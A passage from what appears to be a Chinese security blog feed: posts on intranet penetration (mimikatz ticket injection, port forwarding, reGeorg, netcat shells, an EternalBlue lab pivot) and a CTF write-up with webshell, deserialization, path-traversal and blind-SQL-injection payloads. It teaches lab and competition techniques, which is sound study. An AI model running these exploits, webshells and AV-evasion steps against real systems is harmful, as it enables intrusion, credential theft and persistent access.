#查看当前机器凭证</span><br>mimikatz <span class="hljs-comment"># kerberos::ptc 票据文件名 #将票据注入到内存中</span><br></code></pre></td></tr></table></figure><p>注入成功后,即可使用<code>net use</code>命令登录目标机器:</p><figure class="highlight powershell"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP 密码 /user:用户名<br></code></pre></td></tr></table></figure><p><strong>国产内网杀器–Ladon</strong></p><p>由于是图形化工具,所以这里不再赘述。它的功能包括信息收集、协议扫描、漏洞探针、传递攻击等,有兴趣的自行了解。</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Intranet Penetration</tag>
</tags>
</entry>
<entry>
<title>Intranet Penetration (4): Communication Techniques</title>
<link href="/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E5%9B%9B%EF%BC%89-%E9%80%9A%E4%BF%A1%E6%8A%80%E6%9C%AF/"/>
<url>/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E5%9B%9B%EF%BC%89-%E9%80%9A%E4%BF%A1%E6%8A%80%E6%9C%AF/</url>
<content type="html"><![CDATA[<h2 id="主要通信技术"><a href="#主要通信技术" class="headerlink" title="主要通信技术"></a>Main communication techniques</h2><p>After obtaining privileges on a host in some network, you may find that neither traffic nor the obtained access can be brought out, which severely hampers the penetration test. Intranet penetration therefore requires understanding two main communication techniques: <strong>proxies and tunnels (port forwarding)</strong>.</p><p>The problem proxies solve: put simply, a proxy solves communication between networks, for instance between an intranet and the Internet or between two intranets; two different intranets can only talk to each other through a proxy.</p><p>The problem tunnels solve: put simply, traffic that cannot be sent out. Tunnelling is mostly used to get past monitoring by security devices, such as firewall filtering, network connectivity problems and the encapsulation of return data: when the traffic we send is intercepted, tunnelling is used to get around the interception. A tunnel uses a different protocol to make a blocked path passable; building communication over a different protocol can be said to include some proxy techniques as well.</p><h2 id="代理"><a href="#代理" class="headerlink" title="代理"></a>Proxies</h2><h3 id="正向代理和反向代理"><a href="#正向代理和反向代理" class="headerlink" title="正向代理和反向代理"></a>Forward and reverse proxies</h3><p>A forward proxy is one where you actively request a connection to the server; a reverse proxy is one where the server actively connects to you.</p><p>The typical use of a forward proxy is to give LAN clients behind a firewall a way to reach the Internet. A forward proxy can also use caching to reduce network usage;<br>the typical use of a reverse proxy is to expose servers behind a firewall to Internet users. A reverse proxy can also load-balance several back-end servers or provide caching for slower back-end servers.<br>In addition, a reverse proxy can enable advanced URL policies and management so that web pages living on different web server systems appear under a single URL space.</p><h2 id="隧道(端口转发)"><a href="#隧道(端口转发)" class="headerlink" title="隧道(端口转发)"></a>Tunnels (port forwarding)</h2><p>Typically, after gaining host privileges in a penetration test the next step is intranet penetration, and the other machines on the intranet are not reachable from machines outside. At that point we can use a <strong>tunnel (port forwarding)</strong>, or turn this <strong>Internet-facing server</strong> into a <strong>proxy</strong>, so that our own attack machine can directly access and operate the other machines on the intranet. The means of achieving this is called <strong>port forwarding</strong>.</p><p>Tunnelling is done at different OSI layers; broadly there are the following three:<br>Network layer: IPv6 tunnels, ICMP tunnels<br>Transport layer: TCP tunnels, UDP tunnels, ordinary port forwarding<br>Application layer: SSH tunnels, HTTP/S tunnels, DNS tunnels</p><p>Note that before using a given tunnel you need to check whether the environment itself permits that protocol; only then can the corresponding tunnel be used.</p><h2 id="常用工具"><a href="#常用工具" class="headerlink" title="常用工具"></a>Common tools</h2><p>There are many proxy tools commonly used in intranet penetration, for example lcx, nps, frp, venom, proxifier/proxychains + reGeorg and so on. Not all of them are covered here.</p><p>1. LCX (Windows) / Portmap (Linux)</p><p>A very well-known tool that antivirus kills on sight; do the AV evasion before uploading it to the target machine. Download: <a href="https://github.com/AA8j/SecTools/tree/main/lcx">https://github.com/AA8j/SecTools/tree/main/lcx</a></p><p>Two usage scenarios for this tool follow.</p><p>(1) Suppose we already hold the edge server, but because of firewall restrictions inbound ports are blocked while outbound traffic is allowed. The edge server's port can then be forwarded to the attack machine, and we connect to the attack machine's port.</p><p>Edge server running Windows:</p><figure class="highlight powershell"><pre><code class="hljs powershell"># Run on the attack machine:
./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 3389
# -p1 4444: local listening port; -h2 127.0.0.1: destination IP; -p2 3389: destination port.
# Listens on local port 4444 and forwards to port 3389 on 127.0.0.1.

# Meaning of the -m parameter:
# 1. listen on port1 (p1) and connect to port2 (p2) on host2 (h2)
# 2. listen on port1 (p1) and port2 (p2)
# 3. connect to the given port on host1 (h1) and the given port on host2 (h2)

# Run on the edge server:
lcx.exe -slave 192.168.8.48 4444 127.0.0.1 3389
# 192.168.8.48 4444: destination IP and port; 127.0.0.1 3389: the local port being forwarded.
# Forwards local port 3389 to port 4444 on 192.168.8.48.
</code></pre></figure><p>Edge server running Linux:</p><figure class="highlight powershell"><pre><code class="hljs powershell"># Run on the attack machine
./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 222
# -p1 4444: local listening port; -h2 127.0.0.1: destination IP; -p2 222: destination port.
# Listens on local port 4444 and forwards to port 222 on 127.0.0.1.

# Run on the edge server
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.8.48 -p2 4444
# Forwards local port 22 to port 4444 on 192.168.8.48
</code></pre></figure><p>(2) Suppose we already hold the edge server, but the firewall policy prevents port 3389 from reaching the outside; the port can then be mapped to a port that is allowed out.</p><p>Edge server running Windows:</p><figure class="highlight powershell"><pre><code class="hljs powershell"># Run on the edge server
lcx.exe -tran 53 192.168.8.56 3389   # 192.168.8.56 is the edge server's IP
</code></pre></figure><p>Now connect with Remote Desktop to port 53 on 192.168.8.56.</p><p>Edge server running Linux:</p><p>An SSH tunnel is recommended.</p><p>Some readers may ask: since the remote port has already been forwarded to the local machine, why forward it again locally? Because the <code>-slave</code> and <code>-listen</code> parameters must be used as a pair; otherwise the Remote Desktop connection never succeeds.</p><p>2. netsh</p><p>A tool built into Windows that does not need to be uploaded to the target. Note that it cannot forward a local port to another machine. The rules it adds persist across reboots until they are deleted, so they are worth auditing.</p><figure class="highlight powershell"><pre><code class="hljs powershell"># Forward the specified port of any machine to the local host
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=TARGET_PORT connectaddress=127.0.0.1 connectport=LOCAL_PORT protocol=tcp   # add the forwarding rule
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=TARGET_PORT   # delete the forwarding rule (listenaddress must match the rule that was added)
</code></pre></figure><p>3. reGeorg</p><p>reGeorg is a tool that forwards data from an intranet server's port to the local machine through an HTTP/HTTPS tunnel, achieving HTTP-based communication. It is used together with a webshell to set up a SOCKS5 proxy for intranet pivoting and supports many types of webshell. Because it is used so often, most antivirus products intercept it, so AV evasion is needed.</p><p>Evasion version download: <a href="https://github.com/L-codes/Neo-reGeorg">GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg</a></p><p>After uploading the webshell to the <strong>edge server</strong>, open the webshell's URL on the edge server in a browser; if it shows <code>Georg says,'All seems fine'</code>, the connection has been established.</p><p>This tool is usually used together with proxifier or proxychains. After starting the script above, the command line shows the port forwarded to the local machine; then use that with proxifier or proxychains.</p><p>4. netcat (nc)</p><p>This tool is so famous it is called the "Swiss army knife of networking". Besides port forwarding it can also transfer files and scan ports, but that is not covered here; look into the advanced usage if interested.</p><p>Common command-line parameters:</p><figure class="highlight powershell"><pre><code class="hljs powershell">-l   listen mode
-v   verbose output
-p   local port to listen on
-k   keep the server running after a client disconnects
-e   execute the given program, passing it the incoming data
-n   use IP addresses directly, without DNS resolution
</code></pre></figure><p>It is generally used for reverse shells; bind (forward) connections are rarely used. Listen on the public VPS:</p><figure class="highlight powershell"><pre><code class="hljs powershell"># Linux host
nc -lvnp LOCAL_PORT -e /bin/bash
nc -lvnp LOCAL_PORT -c bash
# Windows host
nc -lvnp LOCAL_PORT -e C:\Windows\System32\cmd.exe
nc -lvnp LOCAL_PORT -c cmd
</code></pre></figure><p>Note that <code>-e</code> and <code>-c</code> exist only in builds such as traditional netcat and ncat; the OpenBSD netcat shipped by many Linux distributions has neither. The target can then connect in many ways, for example a bash reverse-shell one-liner, Python, PHP and so on. A recommended Chrome extension is Hack-Tools, which generates all sorts of connection commands, so there is no need to memorise them.</p><p>5. venom</p><p>Reference article: <a href="https://blog.csdn.net/weixin_45859850/article/details/119813079">Venom工具的使用(内网渗透 多级代理)_rang#的博客-CSDN博客_venom工具</a></p><p>6. nps, frp</p><p>Their official documentation is very detailed, so they are not covered here.</p><p>There are also extreme cases, for instance the target intranet's firewall blocking the HTTP protocol, where only DNS, ICMP or SSH tunnels remain. For reasons of space they are not covered here; search for the corresponding tool when needed.</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Intranet Penetration</tag>
</tags>
</entry>
<entry>
<title>Intranet Penetration (3): Multi-layer Intranets</title>
<link href="/2022/01/17/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-%E5%A4%9A%E5%B1%82%E5%86%85%E7%BD%91/"/>
<url>/2022/01/17/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-%E5%A4%9A%E5%B1%82%E5%86%85%E7%BD%91/</url>
<content type="html"><![CDATA[<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>Environment setup</h2><p>Attack machine: Kali Linux 2021.3</p><p>First-layer target (Internet-facing web server): CentOS 7</p><p>Second-layer target (intranet web server): Ubuntu 18.04</p><p>Third-layer target (intranet office machine): Windows 7</p><blockquote><p>Apart from the attack machine, every target has the BT (宝塔) panel installed and its firewall turned off.</p><p>To simulate an attack from the Internet, the attack machine's network settings can be left unchanged.</p></blockquote><h2 id="内网配置"><a href="#内网配置" class="headerlink" title="内网配置"></a>Intranet configuration</h2><p>In VMware's Settings, Virtual Network Editor, add two network adapters, VMnet14 and VMnet15, both in host-only mode. Then set VMnet14's subnet address to 192.168.22.0 and VMnet15's to 192.168.33.0.</p><p>Set CentOS 7's NIC 1 to bridged mode and NIC 2 to custom (VMnet14); set Ubuntu's NIC 1 to VMnet14 and NIC 2 to VMnet15; set Windows 7's NIC to VMnet15.</p><p>With the configuration done, the penetration test begins.</p><h2 id="渗透步骤"><a href="#渗透步骤" class="headerlink" title="渗透步骤"></a>Penetration steps</h2><p>First generate a Linux payload with msf on the Kali attack machine. Since the first-layer target runs the ThinkPHP framework, use the exploit directly to write a one-line webshell and connect with AntSword (蚁剑). However, the BT panel's WAF filters "post", so base64-encode the one-liner before uploading it. Once connected, upload the Linux payload generated by msf and set up the listener (the method is in the earlier notes).</p><h3 id="msf查看网卡情况"><a href="#msf查看网卡情况" class="headerlink" title="msf查看网卡情况"></a>Checking the NICs from msf</h3><p>First run <code>arp -a</code> to view the NIC information on the machine.</p><p>Get the network layout:</p><figure class="highlight bash"><pre><code class="hljs bash">run get_local_subnets
</code></pre></figure><p>Add a route:</p><figure class="highlight bash"><pre><code class="hljs bash">run autoroute -s 192.168.22.0/24
# or
run post/multi/manage/autoroute
</code></pre></figure><p>Why add a route? Because later, when scanning hosts and ports, we need to leave the current meterpreter session, and once we leave it we can no longer reach the intranet hosts and so cannot scan them. Adding the route lets us scan ports even after leaving meterpreter (the hosts cannot be pinged whether or not the route is added).</p><p>View the routing table (check that the route was added):</p><figure class="highlight bash"><pre><code class="hljs bash">run autoroute -p
# or
route print
</code></pre></figure><p>When done, suspend the session with <code>background</code> and use a SOCKS4 proxy:</p><figure class="highlight bash"><pre><code class="hljs bash">use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 192.168.50.xx   # my gateway is 192.168.50.1; enter the Kali attack machine's IP here
exploit
</code></pre></figure><h3 id="使用proxychains代理工具"><a href="#使用proxychains代理工具" class="headerlink" title="使用proxychains代理工具"></a>Using the proxychains proxy tool</h3><p>Configure the proxychains proxy file:</p><figure class="highlight bash"><pre><code class="hljs bash">vim /etc/proxychains4.conf
</code></pre></figure><p>Add <code>socks4 192.168.50.xx 1080</code> on the last line, save and exit (this IP is Kali's as well), then run <code>sessions 1</code> to return to the earlier session.</p><p>Scan the second-layer target with nmap:</p><figure class="highlight bash"><pre><code class="hljs bash">proxychains nmap -Pn -sT 192.168.22.xx
</code></pre></figure><p>You can of course also run the proxy on your own machine, using the Kali attack machine as the proxy server; SocksCap64 is recommended for SOCKS4.</p><p>Get the second-layer target online the same way, run <code>arp -a</code> to view its NICs and configure the routes; the nmap scan shows port 445 open on the third-layer target, and a search shows it is vulnerable to EternalBlue, so use the exploit module built into msf directly:</p><figure class="highlight bash"><pre><code class="hljs bash">use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.xx
exploit
</code></pre></figure><p>To hide the shell process, migrate it into another process:</p><figure class="highlight bash"><pre><code class="hljs bash">getpid
run post/windows/manage/migrate
</code></pre></figure><p>Type <code>shell</code> to run the Windows command that adds a user (if the shell shows garbled characters, run <code>chcp 65001</code>); after leaving the shell, set up port forwarding so that the intranet's port 3389 goes to Kali's local port 1111:</p><figure class="highlight bash"><pre><code class="hljs bash">portfwd add -l 1111 -p 3389 -r 192.168.33.xx
</code></pre></figure><p>Start Remote Desktop:</p><figure class="highlight bash"><pre><code class="hljs bash">rdesktop -u USERNAME -p PASSWORD 192.168.50.xx:1111   # the IP is again Kali's
</code></pre></figure><p>Penetration done; now we can control the third-layer target as we please!</p><h2 id="踩过的坑"><a href="#踩过的坑" class="headerlink" title="踩过的坑"></a>Pitfalls</h2><p>When configuring the ThinkPHP environment on the first-layer target, first run <code>bt default</code> to see the BT panel's security entry URL, then log in. <strong>Note: the public IP it shows cannot be used to log in directly; use the home LAN IP instead.</strong> After logging in, set the domain to the IPs of the first-layer target's two NICs, then set the root directory to <code>/www/wwwroot/ThinkPHP</code>. <strong>Second pitfall: the ThinkPHP rewrite (pseudo-static) rules also have to be configured, and the run directory set to <code>/public</code> (the ThinkPHP version is known to be 5).</strong></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>The notes above look brief and simple, but they take a long time to digest; I ran into many difficulties while reproducing this. Learning intranet penetration is no easy task; let's keep at it and overcome this hurdle together!</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Intranet Penetration</tag>
</tags>
</entry>
<entry>
<title>WUSTCTF2021 Official Write-up</title>
<link href="/2021/12/11/WUSTCTF2021%E5%AE%98%E6%96%B9Write-up/"/>
<url>/2021/12/11/WUSTCTF2021%E5%AE%98%E6%96%B9Write-up/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>This competition had no AWD, only an on-site jeopardy round, held on campus, lasting 8 hours and open only to students of our school!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><h3 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h3><h4 id="寻宝"><a href="#寻宝" class="headerlink" title="寻宝"></a>Treasure hunt</h4><p>Following the hint, visit <code>robots.txt</code>; visit the blog it points to, and from the hint <code>old!old!old!</code> guess that it is time-related; searching from the back, the clue is in the last (earliest published) post <a href="https://unbelievable.cool/1898/11/23/old_blog/">old_blog</a>; the new clue leads to <code>/get_final_treasure.php</code>.</p><figure class="highlight php"><pre><code class="hljs php"><?php
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
include "flag_3.php"; // "The final treasure is in $flag in flag_3.php, can you find it?";
$hello = "world";
$world = "hello";
if ( !isset($_POST["flag"]) )
    die($hello);
foreach ($_GET as $key => $value)
    $$key = $$value;
foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($hello);
echo "give_you_flag!: ". $flag . "\n";
die($world);
?>
</code></pre></figure><p>A simple variable-variable challenge. I used <code>$world</code>; the <code>echo "give_you_flag!: ". $flag . "\n";</code> the challenge provides cannot be used. Payload:</p><figure class="highlight php"><pre><code class="hljs php">GET:world=flag
POST:flag=1
</code></pre></figure><p><code>$world</code> receives the value of <code>$flag</code> before <code>$flag</code> is changed, so it is unaffected. Concatenate the three parts of the flag and submit.</p><h4 id="Ezserialize"><a href="#Ezserialize" class="headerlink" title="Ezserialize"></a>Ezserialize</h4><p>A character-based deserialization escape; either shrinking or growing works. I chose the growing kind (the shrinking kind is the simplest). The number of characters involved works out to 79; below is the URL-encoded string to be escaped:</p><figure class="highlight php"><pre><code class="hljs php">%22%3Bs%3A10%3A%22%00%2A%00vertify%22%3BO%3A5%3A%22admin%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00flag%22%3Bs%3A20%3A%22flag%7BThis_fake_flag%7D%22%3B%7D%7D
</code></pre></figure><p>Use flag and union to complete the escape, the former yielding 2 and the latter 1:</p><figure class="highlight php"><pre><code class="hljs php">POST:
username=aaa&password=aflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagunion%22%3Bs%3A10%3A%22%00%2A%00vertify%22%3BO%3A5%3A%22admin%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00flag%22%3Bs%3A20%3A%22flag%7BThis_fake_flag%7D%22%3B%7D%7D
</code></pre></figure><p>Send the request to get the flag.</p><h4 id="hacker’s-gift"><a href="#hacker’s-gift" class="headerlink" title="hacker’s gift"></a>hacker’s gift</h4><p>For this challenge I used a hint and, honestly, the hint made me want to beat up the challenge author: "find the admin panel and try weak passwords"… Visiting <code>/admin</code> redirects to the admin login page; brute-forcing by hand, after a long and painful round of testing, I found the weak password. (Who knows what I went through; luckily weak passwords like <code>admin666</code> had tormented me before.) Payload:</p><figure class="highlight abnf"><pre><code class="hljs abnf">username=admin
password=admin888
</code></pre></figure><p>In the admin panel, as the challenge name says, there is a gift; the usual route here is getting a shell through a database backup file, which did not work because the x13 plugin was not enabled (I almost impulsively paid 100 yuan to buy the plugin for the server). The site-security section of the back end has a trojan scanner; running it reveals the backdoor file <code>media/door.php</code>; its contents have next to no obfuscation, so follow the flow and piece the final code together, roughly <code><?php @eval($_POST['wen']);?></code>.</p><p>Connect to the webshell and get the flag from the root directory.</p><h4 id="Writeshell"><a href="#Writeshell" class="headerlink" title="Writeshell"></a>Writeshell</h4><p>The challenge's source code is:</p><figure class="highlight php"><pre><code class="hljs php"><?php
highlight_file(__FILE__);
$filename=$_POST['filename'];
$res=["hacker"=>$_GET['cmd']];
$code = '<?php return [';
foreach ($res as $key => $value)
{
    $code .= '\'' . $key . '\'' . '=>' . '\'' . $value . '\'' . ',';
}
$code .= ']; ';
file_put_contents($filename,$code);
?>
</code></pre></figure><p>The test point is clear: using <code>php://filter</code>. The problem here is that what we write ends up as the content after <code>return</code>, so arbitrary code execution is not directly possible and we have to find a way to break out. This is equivalent to bypassing a "death" prefix: plain <code>write=convert.base64-decode</code> fails because of the <code>=</code>, so in the end <code>write=string.strip_tags|convert.base64-decode</code> is used, and the parameter has to close the <code>return</code>. Payload:</p><figure class="highlight php"><pre><code class="hljs php">GET:
cmd=];?>PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz5h   // the base64 decodes to <?php @eval($_POST['cmd']);?>a
POST:
filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=a.php
</code></pre></figure><p>Connect to <code>a.php</code> with AntSword and find the flag in the root directory.</p><h4 id="足迹"><a href="#足迹" class="headerlink" title="足迹"></a>Footprints</h4><p>Following the challenge hint, search for historical vulnerabilities in Chanzhi (禅知) 1.6; there is an unauthenticated arbitrary file read, which can be reached as follows:</p><figure class="highlight awk"><pre><code class="hljs awk">http://127.0.0.1/file.php?pathname=../index.php&t=txt&o=source
</code></pre></figure><p>The hint given on the home page:</p><figure class="highlight html"><pre><code class="hljs html"><h2>That damned hacker wrecked the environment into this state to get the flag.</h2>
<h2>The hacker got into the server as root and took the flag</h2>
<h2>Oh right, I heard this version is Chanzhi 1.6</h2>
</code></pre></figure><p>Combined with the challenge name "footprints", the guess is that a log-type file has to be read.</p><p>I did not solve it during the contest; afterwards the author said to look at the file that records executed commands. Only then was the direction clear: during the contest I included various logs to look for traces, but they were either irrelevant or had mostly been deleted by the author (leaving the last shell history file). The <code>root</code> user's shell history file has to be read:</p><figure class="highlight awk"><pre><code class="hljs awk">http://127.0.0.1/file.php?pathname=../../../../../../../../../root/.bash_history&t=txt&o=source
</code></pre></figure><p>The history contains this:</p><figure class="highlight bash"><pre><code class="hljs bash">#1630747485
find / -name flag
#1630747488
clear
#1630747490
cd /
#1630747491
ls
#1630747495
cat flllllllllllllllll1ag
</code></pre></figure><p>So read the flag with the following payload:</p><figure class="highlight awk"><pre><code class="hljs awk">http://127.0.0.1/file.php?pathname=../../../../../../../../../../../flllllllllllllllll1ag&t=txt&o=source
</code></pre></figure><h4 id="WUST颜值查询2-0"><a href="#WUST颜值查询2-0" class="headerlink" title="WUST颜值查询2.0"></a>WUST Looks Score Query 2.0</h4><p>Filtered: <code>"</code>,<code>'</code>,<code>,
</code>,<code>=</code>,<code>空格</code>,<code>if</code>,<code>like</code>,<code>regexp</code>,<code>--+</code>,<code>sleep</code> ,<code>benchmark</code> ,<code>join</code>这个注入的语句很奇怪,不太懂后台原理(不会开发T^T),之后要和出题人”聊一聊“ 起手测试类型:<code>id=1</code>没有爆错,字母报错,为数字型;这里偶然测试了<code>id=database()</code>发现回显了欢 迎信息(做到后面就会发现在<code>id=0,4,5</code>时有欢迎信息),说明为盲注型。</p><p>目前我所知的范围内,时间盲注无法使用,考虑布尔盲注,构造如下测试语句,页面回显欢迎信息:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">end</span>)<br></code></pre></td></tr></table></figure><p>爆出当前数据库名,下为测试语句,回显欢迎信息;脚本跑出当前数据库名<code>test</code>:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span>(ascii(substr(database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span 
class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><br><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">1</span>)<span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">end</span>)<br></code></pre></td></tr></table></figure><p>爆所有数据库名,下为测试语句,回显欢迎信息;跑出数据库 <code>information_schema</code>,<code>mysql</code>,<code>performance_schema</code>,<code>sys</code>,<code>test</code>:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span>(ascii(substr((<span class="hljs-keyword">select</span>(group_concat(schema_name))<br><span class="hljs-keyword">from</span>(information_schema.schemata))<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">1</span>)<span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>data<br>base()<span class="hljs-comment">/**/</span><span 
class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">end</span>)<br></code></pre></td></tr></table></figure><p>爆出<code>test</code>库的表名,下为测试语句;跑出<code>ctf</code>,<code>flaaaaag</code>:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span>(ascii(substr((<span class="hljs-keyword">select</span>(group_concat(table_name))f<br>rom(information_schema.tables)<span class="hljs-comment">/**/</span><span class="hljs-keyword">where</span><span class="hljs-comment">/**/</span>table_schema<span class="hljs-comment">/**/</span><span class="hljs-keyword">in</span><span class="hljs-comment">/**/</span>(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span>data<br>base()))<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">1</span>)<span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span 
class="hljs-keyword">end</span><br>)<br></code></pre></td></tr></table></figure><p>卡在爆列名上。最后手动测试(猜)出<code>ctf</code>表的两个列名<code> id</code>,<code>name</code>;<code>flaaaaag</code>表的一个列名<code>id</code>。</p><p>经过一番思索,找出了可用于筛选的<code>where</code>条件:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">where</span><span class="hljs-comment">/**/</span>ascii(substr(table_name<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">8</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">102</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">and</span><span class="hljs-comment">/**/</span>ascii(<br>substr(table_name<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">8</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator"><</span><span class="hljs-number">104</span><br></code></pre></td></tr></table></figure><p>含义为限定寻找字段 table_name 中,值第8位字符的ASCII介于102到104之间的数据,通过此种方法, 减小查询范围。下面放出脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#这用于简单的get传参bool盲注</span><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> time<br><br>url = <span class="hljs-string">"http://118.31.32.88:8095/?"</span><br>temp = {<span class="hljs-string">"id"</span> : <span class="hljs-string">""</span>}<br>column = <span class="hljs-string">""</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">1100</span>):<br> time.sleep(<span class="hljs-number">0.03</span>)<br> low = <span class="hljs-number">32</span><br> high =<span class="hljs-number">128</span><br> mid = (low+high)//<span class="hljs-number">2</span><br> <span class="hljs-keyword">while</span>(low<high):<br> <span class="hljs-comment">#爆当前库名</span><br> temp[<span class="hljs-string">"id"</span>] = <span class="hljs-string">"(select/**/case/**/1/**/when/**/(ascii(substr((select/**/database())/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)"</span> %(i,mid)<br> <span 
